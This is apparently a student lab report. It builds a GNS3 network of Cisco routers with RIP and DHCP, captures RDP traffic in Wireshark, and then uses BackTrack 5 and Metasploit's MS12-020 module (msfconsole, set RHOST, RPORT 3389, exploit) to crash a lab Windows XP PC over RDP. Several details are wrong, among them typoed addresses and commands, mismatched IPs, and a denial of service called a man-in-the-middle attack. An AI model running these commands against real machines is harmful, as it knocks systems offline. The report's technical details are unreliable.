Student No: s0610838. William T. Palmieris Network Management Report.

Step 1. Build Network

Set up the Network in GNS3 Gateway.
Set up a Network with a switch and three routers with a PC at the end of each.
The Routers configured were 26000c Cisco Routers The image file for the routers I used
was c2600-is-mz.120-8.image.
The PCs were configured with Windows XP. Install XP set up username and passwords.
For Login.
I installed windows from scratch from the file WINXPVOL_EN.iso.
Disable Windows Firewall on Windows XP.
A third PC was configured with Backtrack5.
The Switch needs no configuration.
The Connections are fast Ethernet from Switch to Router, and Fast Ethernet from Router to
PC.

Configure the Routers to meet the following Routing Tables.

Network
Network 1

Range
192.168.1.0
255.255.255.0

Network 2

192.168.2.0 255.255.255.0

Network 3

192.1683.0 255.255.255.0

Network 4

192.168.4.0 255.255.255.0

This created this series of networks.

Addresses
Router 1= 192.168.1.1
255.255.255.0
Router 2= 192.168.1.2
255.255.255.0
Router 3= 192.168.1.3
255.255.255.0
Router 1= 192.168.2.1
255.255.255.0
PC1= 192.168.2.2
255.255.255.0
Router 2= 192.168.3.1
255.255.255.0
PC2= 192.168.3.2
255.255.255.0
Router 3= 192.168.4.1
255.255.255.0
Backtrack 5= 192.168.4.2
255.255.255.0

Router Configuration
The Routers were configured with the following instructions which are confirmed by hitting
the enter key.
Command
Configure terminal
Interface f0/0 192.168.1.X 255.255.255.0

No shutdown
exit

Notes
Note this should be the connection from
router to switch. The X is also a placeholder
for whichever router youre configuring. It is a
variable
Exits the configuration for this connection

Configure terminal
Interface f0/1 192.168.1.X 255.255.255.0

Note this should be the connection from

router to switch. The X is also a placeholder
for whichever router youre configuring. It is a
variable

No shutdown
exit
Show ip int brief

Exits the configuration for this connection

Shows you table on how the Ip Addresses
have been configured

The next step was to configure the Routers with RIP protocol to do this the instructions are;
Command
Router rip
Version 2
Network 192.168.x.0

Network 192.168.x.0

Notes
Enables RIP version 1
Enables RIP version 2
Note this should be the connection from
router to switch. The X is also a placeholder
for whichever router youre configuring. It is a
variable. First for the PCs network.
Note this should be the connection from
router to switch. The X is also a placeholder
for whichever router youre configuring. It is a
variable. Second for the Routers Network

exit
Configuring DHCP (Dynamic Host Configuration Protocol)
Command
IP dhcp excluded-address 192.168.x.1

Ip dhcp pool poolX

Default-router 192.168.x.1
Dns-server 192.168.X.1
Network 192.168.x.0 255.255.255.0

Lease 23
exit

Notes
This is the address that of the router we
exclude it from the range to prevent it from
being assigned to the computers.
The X is a place holder for which network it
is.
This sets the router to the default gateway.
Sets the the router as the dns server for the
network.
X is a placeholder for which network it is.
This command creates a network range to
assign addresses from.
Leases the addresses for 23 days.

After you do this save the configuration settings so the routers do not rest to factory settings
after you turn them off.
Command
Lease 23
exit
PING the PCs

Notes
Leases the addresses for 23 days.

To test the connection it pays to ping between the two computers.

1. Open Command Prompt
2. To ping. Type the other computers IP address. Example Ping 192.168.3.2
3. The response should look like this;

Switch over to the other computers and ping the previous computer.

Steps 2-3. Observe and Intercept Traffic

Set Up Remote Desktop
Ensure that you have set a password to the profile.
Disable the Firewall.
To do this go into PC1 window.
1. Click on the start menu.
2. Click All Programs.
3. Click Accessories Folder
4. Click Remote Access Connection
5. In the Computer Name Tab enter the IP address of PC2.
6. Enter the user name and password and enter. If configured right it will create a remote
access window to the other PC.
7. Disconnect the VPN.
Observe Traffic Using Wireshark Filter on Port 3389.
In GNS3 click on of the Ethernet cables on the route between PC1 and PC2.
Right Click on the Fast Ethernet connection between the router for PC1 and the connecting
Routers.
Click on start capturing.
Once this happens click on the default connection.
When this process is completed right click on the connection again.
Click on start Wireshark.
This will set the machine up to observe the traffic.
Then switch over to PC1.
In PC1 follow the steps laid out in Set-Up Remote Desktop.
Then go back into Wireshark.
Observe TCP streams
The Remote Access connection begins in the blue protocols highlighted in this document.

The encryption of the password is RSA (RC4) encrypted as established by the second
screenshot the encryption runs anywhere between the two connections.
The point of this demonstration is to establish that the RSA encryption prevents the remotes
desktop access cannot be observed via wireshark.

Step 4. Attempt a man in the Middle Attack using Backtrack 5

Configure Bactrack5 in GNS3.
Connect it to the middle router.
The start-up configurations to Backtrack are as follows.
Start login: root
Password: toor
Enter start x
Start the program konsole.
Enter the following commands
Command
Nmap -0 192.168.3.3

Notes
The following IP address is the address
of PC2 in my prac. This command shows
what ports are available for setting a
denial of service attack on this specific
operating system.

The 3389 port is the port we are going to attack. To crash PC2 the following
commands should be used.
Commands

Note

Msfconsole

This opens up the metasploits which is the program

used to exploit a security weakness. The
msfconsole is probably the most popular interface
to the MSF. It provides an "all-in-one" centralized
console and allows you efficient access to virtually
all of the options available in the Metasploit
Framework.
This program sets metasploits to attack the MS12020 RDP vulnerability. To better describe the
effects see this webpage.
http://www.metasploit.com/modules/auxiliary/dos/wi
ndows/rdp/ms12_020_maxchannelids
This sets a target address for msfconsole to exploit

Use
auxiliary/dos/windows/rdp/m
s12_20_maxchannelids

Set RHOST 192.168.3.3

Set RPORT 3389

This Sets the port that the metasploits is going to

attack through this port is known as Microsoft
Terminal Server (RDP) officially registered as Windows
Based Terminal (WBT). It provides the user graphical
interface.

Exploit

This exploits this open port to cause a denial-ofservice attack/ man-in-the-middle attack.

The following screen in Backtrack5 indicates that the attack was successful. If you
have the PC in the background it should quickly reboot itself. In a real physical
scenario the computer would just turn off.
In some scenarios these commands may fail to exploit the system. Three possible
scenarios where a failure to exploit are if;
1. The exploit has been closed by a system update.
2. If the port has been closed off, this is an unlikely scenario because if the ports
have been closed off then it would be impossible to run remote desktop
anyway.
3. If the Operating system has had IDS/IPS installed. This is a Intrusion
detection/protection system. Its name is pretty self-explanatory.